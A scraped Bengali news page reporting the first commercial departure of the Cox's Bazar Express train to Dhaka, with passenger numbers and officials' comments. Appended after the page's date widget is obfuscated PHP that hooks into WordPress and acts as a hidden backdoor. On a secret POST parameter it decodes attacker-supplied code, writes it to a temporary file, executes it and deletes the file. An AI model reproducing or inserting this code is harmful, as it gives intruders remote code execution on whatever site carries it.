• বুধবার, ১৯ জুন ২০২৪, ০৫:১১ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

অপেক্ষার অবসান ঘটিয়ে ঢাকার উদ্দেশ্যে কক্সবাজার ট্রেন

নিজস্ব প্রতিবেদক:
আপডেট : শুক্রবার, ১ ডিসেম্বর, ২০২৩


নিজস্ব প্রতিবেদক  :


প্রথমবারের মতো হুইসেল বাজিয়ে ট্রেন ছেড়ে গেছে সমুদ্র শহর কক্সবাজার থেকে। ঢাকা কক্সবাজার রুটে অবশেষে সেই স্বপ্নের ট্রেন চলাচল শুরু হয়েছে শুক্রবার দুপুর সাড়ে বারোটায়। কক্সবাজার আইকনিক রেলস্টেশন থেকে প্রথম ছেড়ে যাওয়া বাণিজ্যিক ট্রেন কক্সবাজার এক্সপ্রেস। স্বপ্ন যেনো হাতের মুঠোয়।

ঘড়ির কাটায় ঠিক ১২ টা ৩১ মিনিট। হুইসেল বাজানোর সাথে সাথে এগিয়ে চলছে ট্রেন। ইঞ্জিনের বগিতে লাল সবুজের পতাকা নিয়ে প্রথম বানিজ্যিক ট্রেন দ্রুত গতিপেল মুহূর্তেই।

সকাল থেকে যাত্রীরা আসতে শুরু করে কক্সবাজার আইকনিক রেল স্টেশনে। কক্সবাজার চট্টগ্রাম এবং ঢাকা রুটে ট্রেন যাত্রায় অংশ নিয়ে ইতিহাসের সাক্ষি হতে আগে থেকে প্রথম দিনের টিকিট বুকিং করেছিলেন যাত্রীরা। এই যাত্রায় এক হাজার বিশ জন যাত্রীদের মধ্যে বেশীর ভাগই ছিল পর্যটক।কক্সবাজার থেকে ট্রেনে করে নিজ গন্তব্যে ফিরতে পেরে খুশি তারা। আবার কক্সবাজারের স্থানীয় অধিবাসীদেরও উচ্ছ্বাসের কমতি ছিলো না।

রেল যাত্রীদের নিরাপত্তায় কাজ করছে আইনশৃঙ্খলা বাহিনীর সদস্যরা। বিশেষ করে পর্যটকরা যাতে হয়রানীর শিকার না হয় তার জন্য রেল স্টেশনে থাকবে টুরিস্ট পুলিশ এমনটাই জানিয়েছেন ট্যুরিস্ট পুলিশের অতিরিক্ত ডি আই জি আপেল মাহমুদ।

এদিকে প্রথম বানিজ্যিক রেল চলাচল উদ্বোধন করেন রেল সচিব ড. মো: হুমায়ুন কবির কক্সবাজার স্টেশনকে ঘিরে সরকারের নানা পরিকল্পনার কথা বলেন। তিনি বলেন, পর্যায়ক্রমে এই রুটে রেলের আরো সুযোগ সুবিধা বাড়ানে হবে।

আগামী ৯ ডিসেম্বর পর্যন্ত এই রুটে রেলের আগাম টিকিট বিক্রি হয়ে গেছে। প্রতিদিন একটি ট্রেন সকালে কক্সবাজার থেকে ঢাকার উদ্দেশ্য ছেড়ে যাবে এবং রাতে ঢাকা থেকে একই ট্রেন কক্সবাজারের উদ্দেশ্য ছেড়ে আসবে বলে জাননা রেল কতৃপক্ষ। বিজয়ের মাসের প্রথন দিনে কক্সবাজার এক্সপ্রেস চালু হওয়া আরেকটি বিজয়ের পালক হিসেবে দেখছেন কক্সবাজারের মানুষেরা।

দুপুর ১২টা৩১ মিনিটে কক্সবাজার আইকনিক রেল টেশন থেকে ছেড়ে যায় এ ট্রেন। এ যেন এক দীর্ঘ অপেক্ষার অবসান। প্রথমবারের মতো হুইসেল বাজিয়ে ট্রেন ছেড়ে গেলো সমুদ্র শহর কক্সবাজার থেকে। ঢাকা কক্সবাজার রুটে অবশেষে সেই স্বপ্নের ট্রেন চলাচল শুরু হলো আজ শুক্রবার।

দুপুর ১২ টা ৩১ মিনিটে কক্সবাজার আইকনিক রেলস্টেশন থেকে ছেড়ে গেল প্রথম বাণিজ্যিক ট্রেন কক্সবাজার এক্সপ্রেস। এর মধ্য দিয়ে স্বপ্নের বাস্তবায়ন হলো দেশের সর্বদক্ষিণ অঞ্চলের মানুষের।

কক্সবাজার এক্সপ্রেস নামের এই ট্রেনটির ২০ টি বগিতে রয়েছে ১০২০ জন যাত্রী।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (বিকাল ৫:১১)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}